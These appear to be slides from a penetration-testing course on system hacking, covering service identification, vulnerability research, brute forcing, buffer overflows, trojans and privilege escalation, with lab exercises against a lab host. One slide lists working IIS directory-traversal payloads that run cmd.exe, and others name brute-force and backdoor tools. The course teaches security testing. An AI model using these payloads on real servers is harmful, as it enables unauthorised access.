1.03k likes | 1.47k Views
System Hacking. Section 4. Outline. Service identification Vulnerability identification and research Exploits Putting it all together Target selection in large networks Using automated tools. Service Identification. Section 4.1. Service Identification. Common ports Banners
E N D
System Hacking Section 4
Outline • Service identification • Vulnerability identification and research • Exploits • Putting it all together • Target selection in large networks • Using automated tools
Service Identification Section 4.1
Service Identification • Common ports • Banners • Fingerprinting
Connecting to ports • Telnet or netcat is the best way to connect to ports • Many services may be accessed directly
Common ports Many services can be identified by their common port numbers
Banners Some services may be better identified by banners: • telnet on routers (2001, 4001, 6001) • Web daemons for applications • Compaq Insight Manager • Many systems include web configuration interfaces
Fingerprinting Some services cannot be clearly identified just by connecting the them: • Netbus on NT uses the same port as an RPC service on Solaris • Some database connections do not provide automatic response Fingerprinting a service may identify what it is, even if it has moved ports
Vulnerability Research Section 4.2
Vulnerability identification and research • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities Several methods to map vulnerabilities: • Manually map identified systems against publicly available database such as www.securityfocus.com, www.cert.org and vendor security alerts • Use public exploit code posted to various security mailing lists, hacker websites or write your own code • Use automated vulnerability scanning tools such as Nessus, ISS or whisker
Lab • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified. • www.securityfocus.com • General searches on google.com • www.packetstormsecurity.com • www.astalavista.box.sk • www.securiteam.com Time: 30 minutes
Exploits Section 4.3
Types of exploits • Remote exploits • Trojans • Privilege escalation
Remote Exploits Section 4.3.1
Remote exploits A ‘remote exploit’ attempts to gain access across the network and without proper authentication. Examples: • Brute force authentication attempts • Attacks bypassing integrity checkers • Buffer overflows • Sniffing (to some extent)
Brute force attacks Most common services attacked • Telnet • FTP • “R” commands • Secure Shell • SNMP community names • Post Office Protocol (POP) • HyperText Transport Protocol (HTTP/HTTPS) • SMB
Common Tools used • Brutus • Admsnmp • Admsmb • TeeNet • Pwscan.pl • Thc_hydra
Remote password guessing • Attempting to connect to an enumerated share such as (ADMIN$ and C$) and trying username/password combinations until one works • A “null session” can be established with the target to obtain valid account names • Use an automated password guessing tool to brute force the selected shares.
Brute force attacks under Windows • Some common services prone to brute-force: • Web • Netbios • FTP
Brute force attacks under Unix • Some common services prone to brute-force: • telnet • Ssh • Web • FTP • R-commands
Lab • Use a Netbios scanning tool to identify local shares on this network • Use brute force tool to attempt access to an account on 10.0.1.120 • Warning! These tools can produce significant traffic and lock accounts. Time: 30 minutes
Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Stack overflows • Format string overflows • Heap overflows • Overflow subverting the control path
Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Occurs when a user or process attempts to place more data into a buffer than was originally allocated • Commonly associated with C functions like strcpy(), strcat(), sprintf() and etc • Most frequently found when user input is taken and passed into an application
Windows buffer overflows • Only a few conditions have been revealed to date • All of them exploited flaws in application programs • Very common for DoS attacks Exploits • Netmeeting 2.x by Cult of the Dead Cow • NT RAS by Cerberus Information Security • Winhlp32 by Cerberus Information Security • IISHack by eEye • Oracle Web Listener 4.0 by CIS • Outlook GMT token overrun by Underground Security Systems Research • IIS .printer
Unix buffer overflows • Sadmind • ftp • Ssh • nfs
Unexpected input • Bypassing integrity checks • Gaining access by providing unexpected input • IIS unicode • Web applications
Format string attacks • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf() • Efforts usually focused on SUID root programs
Input validation attacks • Occurs when a program fails to recognise syntactically incorrect input • Occurs when a module accepts extraneous input • Occurs when a module fails to handle missing input fields • A field-value correlation error occurs • Common in web applications
IIS vulnerabilities • Unicode and URL based attacks • Special tags in HTTP • Sample scripts to brute force
IIS hacking • /scripts/root.exe?/c+dir • /MSADC/root.exe?/c+dir • /c/winnt/system32/cmd.exe?/c+dir • /d/winnt/system32/cmd.exe?/c+dir • /scripts/..%255c../winnt/system32/cmd.exe?/c+dir • /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir • /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Lab • Use the provided URLs to roam the filesystem of 10.0.1.120 • What is accessible and what is not? Time: 10 minutes
Trojan Horses and Backdoors Section 4.3.2
Windows trojans and backdoors These programs provide unauthorised access to a system without the user’s knowledge: • Theef • CDC BackOrifice • SubSeven • Moosucker A great site: http://www.tlsecurity.net
Privilege Escalation Section 4.3.3
Privilege escalation • Attack used to move from normal user to superuser • Quest for Administrator • Quest for root
Quest for Administrator • Hoovering information • Getadmin • Sechole • Spoofing LPC Port requests
Hoovering information • Identify further information that will gain higher privileges • Srvinfo • Find utility • regdmp
Getadmin • Windows NT 4 • Small program written by Konstantin Sobolev • Adds users to the local admin group • Hijacks a process called winlogon • Patched by NT SP3
Sechole • Similar functionality to getadmin • Modifies instructions in the memory of the OpenProcess API • Possible to launch remotely if IIS is running • Patched by NT SP6a
Spoofing LPC Port Requests • Vulnerability identified by The RAZOR Team at http://razor.bindview.com • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API
Quest for root • Local buffer overflow • Symlink • File Descriptor attacks • Signal handling • Core-file manipulation • Shared libraries • Kernel flaws • System misconfiguration • IFS attacks